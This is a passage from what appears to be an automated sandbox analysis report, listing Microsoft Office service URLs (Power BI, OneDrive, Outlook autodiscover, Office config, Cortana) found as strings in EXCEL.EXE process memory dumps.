      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplatettJ
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.cortana.ai
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnosticssdf.office.comK
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net?
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netr
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netx
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comcent
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://augloop.office.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.433453972.0000000012E78000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429211317.0000000012E78000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629921946.0000000012E78000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536887114.0000000012E78000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comm
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmli
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000002.626211549.000000000D6EE000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellp
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/5
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/e
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies-
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosP
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macG
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyP
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyc
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.coms
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cortana.ai
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
